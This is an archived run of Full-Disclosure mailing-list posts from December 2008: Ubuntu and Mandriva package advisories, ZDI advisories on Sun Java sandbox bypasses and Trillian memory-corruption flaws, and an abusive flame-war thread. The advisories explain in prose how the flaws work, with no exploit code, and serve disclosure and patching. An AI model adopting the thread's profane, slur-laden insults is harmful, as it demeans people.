http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_amd64.deb Size/MD5: 105890 d8e004d18150e3d6e91575e91b9f3c0c http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_amd64.deb Size/MD5: 125960 7ddc8bb36714d4ee3db12ce91adbda22 http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_amd64.deb Size/MD5: 45058 d7f5a96c16456e520a28e0c0cb31cb0c i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_i386.deb Size/MD5: 94970 37cc41d6a9ad5505cb32528f14ec647f http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_i386.deb Size/MD5: 112816 e47956631dcb0c8980cd0f72a4e8428e http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_i386.deb Size/MD5: 43208 c0a0ff484719033e7be7ef166d54602f powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_powerpc.deb Size/MD5: 107416 aac5f08b6f0f1fb5dea98a574d129225 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_powerpc.deb Size/MD5: 123988 dac1ae13e726e5e8bdca56aae8ab2a23 http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_powerpc.deb Size/MD5: 44786 b65159109f7d2f0678350194be9b25c8 sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.0.7-3ubuntu2.1_sparc.deb Size/MD5: 96252 8628208ebf8634aeb657c1f99c34ec83 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.0.7-3ubuntu2.1_sparc.deb Size/MD5: 114508 a96b1eab0b5a39e0062ad2c1592c2bd6 http://security.ubuntu.com/ubuntu/pool/universe/n/nfs-utils/nhfsstone_1.0.7-3ubuntu2.1_sparc.deb Size/MD5: 44092 fffba1487c5b3660c592bfe6e5bdc935 Updated packages for Ubuntu 7.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.diff.gz Size/MD5: 30941 387a16c1bfc126fe5228b7cd7f895b47 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709-3ubuntu1.1.dsc Size/MD5: 1041 ee2f5835d47387259a1ffc509a1c800e http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.1~git-20070709.orig.tar.gz Size/MD5: 1207377 0c1a357290f5f233543bc942c0a006ad amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_amd64.deb Size/MD5: 187718 a21ea0964e11dc7437b31c8a24136a4e http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_amd64.deb Size/MD5: 158258 5245d20a87b1f265d699082fd3465cf0 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_i386.deb Size/MD5: 176422 90dcb97b35a35e59de12e1432c1ab276 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_i386.deb Size/MD5: 148016 9f1a96121a13d0c89fed88ff4651600c lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_lpia.deb Size/MD5: 174424 09722999f8b92441488357e7d51b78be http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_lpia.deb Size/MD5: 147538 3983e3fa6588d37d350cd99441b6c2eb powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb Size/MD5: 196470 d8ac43aff7c7099db1751dbe7e7064dc http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_powerpc.deb Size/MD5: 164396 668269dd69cbc4c3f51510b4fa41e9ef sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.1~git-20070709-3ubuntu1.1_sparc.deb Size/MD5: 179480 3e647339bec5baa0f94fd87a5569d8fa http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.1~git-20070709-3ubuntu1.1_sparc.deb Size/MD5: 149530 072323ce17f01390d48928254953af97 Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.diff.gz Size/MD5: 35143 8595826433437ca8d573aadecec55b9e http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-2ubuntu2.2.dsc Size/MD5: 1022 c62bbac19283a7958350d308197562fe http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz Size/MD5: 797386 76ee9274c2b867839427eba91b327f03 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_amd64.deb Size/MD5: 203396 e8caf55e52bd09522c911658c9208e0a http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_amd64.deb Size/MD5: 161652 0b2da0a86933e493142827ee3491f041 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_i386.deb Size/MD5: 190380 3365b806f003547556784dc460854acf http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_i386.deb Size/MD5: 150442 ae44f68055ff09b377dda8f77e7d7369 lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_lpia.deb Size/MD5: 190708 56cff37c459c9bacecc0e19eac96493b http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_lpia.deb Size/MD5: 150870 0fa925b4b0417a78b81fd437978469ab powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_powerpc.deb Size/MD5: 212528 a92ea0106bf861d99eb2bcbb0e41e49c http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_powerpc.deb Size/MD5: 167720 2efce3bec09f1c42f577071a597236cb sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-2ubuntu2.2_sparc.deb Size/MD5: 193568 c82d3d388b1839ce31464b2941f9c9a3 http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-2ubuntu2.2_sparc.deb Size/MD5: 151834 6028d63bf61670986dd3ac84d82f8f7e Updated packages for Ubuntu 8.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.diff.gz Size/MD5: 36776 80b7806275d3318009e26cdd4f21e80e http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2-4ubuntu1.1.dsc Size/MD5: 1426 d54ccf3d5cc03325778b2197597eb3b4 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-utils_1.1.2.orig.tar.gz Size/MD5: 797386 76ee9274c2b867839427eba91b327f03 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_amd64.deb Size/MD5: 206234 8fade4ffc3b54967b451601ebe3cd783 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_amd64.deb Size/MD5: 163432 52da66c1d20b506f83794d1116d7197f i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_i386.deb Size/MD5: 191928 daf9c6e085ae1dc0677dd86c7946aac9 http://security.ubuntu.com/ubuntu/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_i386.deb Size/MD5: 151532 87df37c719bd84c7520b0dfa86b9587d lpia architecture (Low Power Intel Architecture): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_lpia.deb Size/MD5: 190668 8d2b6e20721ce687cb179b755e36d680 http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_lpia.deb Size/MD5: 151770 701f49fcee4e0d9c4db0ddba416a80bf powerpc architecture (Apple Macintosh G3/G4/G5): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_powerpc.deb Size/MD5: 210084 3cddb9b535c4266bc418d83c3c68e817 http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_powerpc.deb Size/MD5: 165774 e797caaae77e93b657884c8076da8742 sparc architecture (Sun SPARC/UltraSPARC): http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-common_1.1.2-4ubuntu1.1_sparc.deb Size/MD5: 195372 3026036061bc3138387bb29a81dc4836 http://ports.ubuntu.com/pool/main/n/nfs-utils/nfs-kernel-server_1.1.2-4ubuntu1.1_sparc.deb Size/MD5: 153086 ccddafa24f7ce6182616c995b2c90603 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 197 bytes Desc: This is a digitally signed message part Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20081204/f19f771f/attachment.bin From xploitable at gmail.com Thu Dec 4 23:41:01 2008 From: xploitable at gmail.com (n3td3v) Date: Thu, 4 Dec 2008 23:41:01 +0000 Subject: [Full-disclosure] Staff incompetence is real, cyber terrorism is fake Message-ID: <4b6ee9310812041541q6be583a0qd11227de40aab2ef@mail.gmail.com> http://lists.grok.org.uk/pipermail/full-disclosure/2008-December/066180.html From zdi-disclosures at 3com.com Fri Dec 5 00:19:04 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 4 Dec 2008 18:19:04 -0600 Subject: [Full-disclosure] ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass Vulnerabilities Message-ID: ZDI-08-081: Sun Java Web Start and Applet Multiple Sandbox Bypass Vulnerabilities http://www.zerodayinitiative.com/advisories/ZDI-08-081 December 4, 2008 -- Affected Vendors: Sun Microsystems -- Affected Products: Sun Microsystems Java Runtime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 5527, 4714. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: These vulnerabilities allow remote attackers to bypass sandbox restrictions on vulnerable installations of Sun Java Web Start. User interaction is required to exploit this vulnerability in that the target must visit a malicious page. The first vulnerability results in a cache location and a user name information disclosure. By accessing the SI_FILEDIR property of a SingleInstanceImpl class, the location of the temporary single instance files can be parsed to discover the user name and cache location. The second vulnerability allows applets to read any file on a victim's filesystem, outside of the restricted path of the applet. The specific flaw exists in the handling of the file: protocol assigned to an applet codebase. If the codebase points to the local filesystem, any file is then readable by the malicious applet. The third vulnerability allows JNLP files to bypass socket restrictions. By loading a secondary JNLP with an href attribute containing a wildcard. When this object is instantiated, all hosts are eligible for socket connect and accept. -- Vendor Response: Sun Microsystems has issued an update to correct this vulnerability. More details can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-244988-1 -- Disclosure Timeline: 2008-07-14 - Vulnerability reported to vendor 2008-12-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Peter Csepely -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Fri Dec 5 00:18:08 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 4 Dec 2008 18:18:08 -0600 Subject: [Full-disclosure] ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability Message-ID: ZDI-08-078: Trillian IMG SRC ID Memory Corruption Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-078 December 4, 2008 -- Affected Vendors: Cerulean Studios -- Affected Products: Cerulean Studios Trillian -- Vulnerability Details: This vulnerability allows remote attackers to potentially execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability. The specific flaw exists within the XML processing code for Trillian. When parsing specially formulated xml, the application will corrupt an internal data structure. Whilst deallocating this data structure, the application can be tricked into freeing a single allocated chunk multiple times, which can potentially lead to code execution. -- Vendor Response: Trillian has issued an update to correct this vulnerability. More details can be found at: http://blog.ceruleanstudios.com/?p=404 -- Disclosure Timeline: 2008-11-10 - Vulnerability reported to vendor 2008-12-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Fri Dec 5 00:17:48 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 4 Dec 2008 18:17:48 -0600 Subject: [Full-disclosure] ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability Message-ID: ZDI-08-077: Trillian AIM IMG Tag Parsing Stack Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-077 December 4, 2008 -- Affected Vendors: Cerulean Studios -- Affected Products: Cerulean Studios Trillian -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability. The specific flaw exists within the tooltip processing code for Trillian. When creating a tooltip for an image, the application generates an XML tag including a property containing the filename. This data is then copied directly into a stack-based buffer without any length verifications which can eventually lead to code execution with the privileges of the client. -- Vendor Response: Cerulean Studios has issued an update to correct this vulnerability. More details can be found at: http://blog.ceruleanstudios.com/?p=404 -- Disclosure Timeline: 2008-11-10 - Vulnerability reported to vendor 2008-12-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Fri Dec 5 00:18:26 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 4 Dec 2008 18:18:26 -0600 Subject: [Full-disclosure] ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow Vulnerability Message-ID: ZDI-08-079: Trillian AIM Plugin Malformed XML Tag Heap Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-079 December 4, 2008 -- Affected Vendors: Cerulean Studios -- Affected Products: Cerulean Studios Trillian -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Cerulean Studios Trillian. Authentication is not required to exploit this vulnerability. The specific flaw exists within the XML processing code for Trillian. When parsing a malformed XML tag, the application does not allocate enough space for it's contents. During copying of this to the newly allocated buffer, the application will overwrite heap structures with attacker-supplied data that can then be leveraged to achieve code execution with the privileges of the application. -- Vendor Response: Cerulean Studios has issued an update to correct this vulnerability. More details can be found at: http://blog.ceruleanstudios.com/?p=404 -- Disclosure Timeline: 2008-11-24 - Vulnerability reported to vendor 2008-12-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Damian Put -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From zdi-disclosures at 3com.com Fri Dec 5 00:18:45 2008 From: zdi-disclosures at 3com.com (zdi-disclosures at 3com.com) Date: Thu, 4 Dec 2008 18:18:45 -0600 Subject: [Full-disclosure] ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability Message-ID: ZDI-08-080: Sun Java AWT Library Sandbox Violation Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-08-080 December 4, 2008 -- Affected Vendors: Sun Microsystems -- Affected Products: Sun Microsystems Java Runtime -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability by Digital Vaccine protection filter ID 6249. For further product information on the TippingPoint IPS, visit: http://www.tippingpoint.com -- Vulnerability Details: This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Sun Microsystems Java. User interaction is required in that a user must open a malicious file or visit a malicious web page. The specific flaw occurs within the Java AWT library. If a custom image model is used for the source 'Raster' during a conversion through a 'ConvolveOp' operation, the imaging library will calculate the size of the destination raster for the conversion incorrectly leading to a heap-based overflow. This can result in arbitrary code execution under the context of the current user. -- Vendor Response: Sun Microsystems has issued an update to correct this vulnerability. More details can be found at: http://sunsolve.sun.com/search/document.do?assetkey=1-66-244987-1 -- Disclosure Timeline: 2008-04-16 - Vulnerability reported to vendor 2008-12-04 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by: * Anonymous -- About the Zero Day Initiative (ZDI): Established by TippingPoint, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. TippingPoint does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, TippingPoint provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, TippingPoint provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. Our vulnerability disclosure policy is available online at: http://www.zerodayinitiative.com/advisories/disclosure_policy/ CONFIDENTIALITY NOTICE: This e-mail message, including any attachments, is being sent by 3Com for the sole use of the intended recipient(s) and may contain confidential, proprietary and/or privileged information. Any unauthorized review, use, disclosure and/or distribution by any recipient is prohibited. If you are not the intended recipient, please delete and/or destroy all copies of this message regardless of form and any included attachments and notify 3Com immediately by contacting the sender via reply e-mail or forwarding to 3Com at postmaster at 3com.com. From ghosts at gmail.com Fri Dec 5 00:49:10 2008 From: ghosts at gmail.com (ghost) Date: Thu, 4 Dec 2008 19:49:10 -0500 Subject: [Full-disclosure] News for Ureleet In-Reply-To: <1228431557.23932.4.camel@roswell.ausics.net> References: <4b6ee9310812030043k746d8dc2pda041c096b41196d@mail.gmail.com> <6158bb410812030652r7a8a5c8as3cc62f4ac3979df@mail.gmail.com> <4b6ee9310812031346m3129a698x561fda046588fe52@mail.gmail.com> <6f4bb0b50812031923y562135byd77eddd898caae6@mail.gmail.com> <1228431557.23932.4.camel@roswell.ausics.net> Message-ID: <6f4bb0b50812041649lb0d57a3le14927b232d22ae8@mail.gmail.com> a wanka mate? well i be a fag from down unda, cheers & jolly ho ol chap. This is the only contribution youve made to full-disclosure. So whos the useless wanka then? go on back to your bread pudding before i take a piss on ya and give you a good rodging. On Thu, Dec 4, 2008 at 5:59 PM, Noel Butler wrote: > really, interesting.. how can they contribute to anyone else's benefit, > since they are both fucking cockheads and are in almost everyones shitlist > filters, infact how do we not know ghost, you are not another one of this > delusional fuckheads aliases, you'd have to be, to be even making out like > you even read anything those wankas post. > > > > On Thu, 2008-12-04 at 13:23, ghost wrote: > > Hey mike, how about you stop playing moderator you fucking douche bag. > I for one believe netdev brings alot to this list and encourage him > and ureleet to continue posting. > > On Wed, Dec 3, 2008 at 9:47 PM, Mike C wrote: >> Hye Guys, >> >> I though we had settled the issues offline. Lets restart our >> discussions.. this bickering is highly unnecessary on the list. >> >> -- >> MC >> Security Researcher >> Lead, Project Chroma >> http://sites.google.com/site/projectchromaproject/ >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From security at mandriva.com Fri Dec 5 01:34:00 2008 From: security at mandriva.com (security at mandriva.com) Date: Thu, 04 Dec 2008 18:34:00 -0700 Subject: [Full-disclosure] [ MDVSA-2008:238 ] libsamplerate Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2008:238 http://www.mandriva.com/security/ _______________________________________________________________________ Package : libsamplerate Date : December 4, 2008 Affected: 2008.0, 2008.1, Corporate 3.0, Corporate 4.0 _______________________________________________________________________ Problem Description: A buffer overflow was found by Russell O'Conner in the libsamplerate library versions prior to 0.1.4 that could possibly lead to the execution of arbitrary code via a specially crafted audio file (CVE-2008-5008). The updated packages have been patched to prevent this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5008 _______________________________________________________________________ Updated Packages: Mandriva Linux 2008.0: 9a9cc1fbac25741ad38e914c98d90826 2008.0/i586/libsamplerate0-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm 294117b4e81f6d38553faf47b0d0b561 2008.0/i586/libsamplerate-devel-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm 695ab47e44749f3f0a6df321992f6064 2008.0/i586/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.0.i586.rpm 4068b67bd67786501ddc388824763a19 2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.0.src.rpm Mandriva Linux 2008.0/X86_64: 24a792941fa5fbff89764b724923a616 2008.0/x86_64/lib64samplerate0-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm c1ac9d056ca38c36658158fec3ee3f31 2008.0/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm dcdffc679e6af71864d8cdb78e335df8 2008.0/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.0.x86_64.rpm 4068b67bd67786501ddc388824763a19 2008.0/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.0.src.rpm Mandriva Linux 2008.1: f44c5b4f55bbe4ad946f46456dce4745 2008.1/i586/libsamplerate0-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm 18a7016e5da1f0f37c3cde4222703f87 2008.1/i586/libsamplerate-devel-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm 6064159a6a594c006d16c42d29cfd240 2008.1/i586/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.1.i586.rpm 32697b41d7fd390e91b4d4dbeacc0db2 2008.1/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.1.src.rpm Mandriva Linux 2008.1/X86_64: 6497eadf29decebda33422f431a83d45 2008.1/x86_64/lib64samplerate0-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm 2df7b9d3f1656f728667e68569cfc8af 2008.1/x86_64/lib64samplerate-devel-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm b9c0276018ac620bbcd68f998b4daeac 2008.1/x86_64/libsamplerate-progs-0.1.3-0.pre6.3.1mdv2008.1.x86_64.rpm 32697b41d7fd390e91b4d4dbeacc0db2 2008.1/SRPMS/libsamplerate-0.1.3-0.pre6.3.1mdv2008.1.src.rpm Corporate 3.0: 91ef6d6952ac4d845f4ed16b74117d8d corporate/3.0/i586/libsamplerate0-0.0.15-2.1.C30mdk.i586.rpm 7d1aef25a43863e4a7d89fd559312b29 corporate/3.0/i586/libsamplerate0-devel-0.0.15-2.1.C30mdk.i586.rpm e3d9b6a0c2d32d36bd55b3d2b9ff8fa7 corporate/3.0/i586/libsamplerate-progs-0.0.15-2.1.C30mdk.i586.rpm 67cdb6d349097d08925e2c4cb86d1fe6 corporate/3.0/SRPMS/libsamplerate-0.0.15-2.1.C30mdk.src.rpm Corporate 3.0/X86_64: 3efec8fbd1ea1fd00f9eea336afd5798 corporate/3.0/x86_64/lib64samplerate0-0.0.15-2.1.C30mdk.x86_64.rpm 5783d23a1019bed054e713b94c5ad989 corporate/3.0/x86_64/lib64samplerate0-devel-0.0.15-2.1.C30mdk.x86_64.rpm f970ddd128def98252bc4090f576f4ec corporate/3.0/x86_64/libsamplerate-progs-0.0.15-2.1.C30mdk.x86_64.rpm 67cdb6d349097d08925e2c4cb86d1fe6 corporate/3.0/SRPMS/libsamplerate-0.0.15-2.1.C30mdk.src.rpm Corporate 4.0: 0a2d27263f81d8304028bccadb5142af corporate/4.0/i586/libsamplerate0-0.1.2-1.1.20060mlcs4.i586.rpm 7d3dddddbad29db356b97dc77f720c0a corporate/4.0/i586/libsamplerate0-devel-0.1.2-1.1.20060mlcs4.i586.rpm 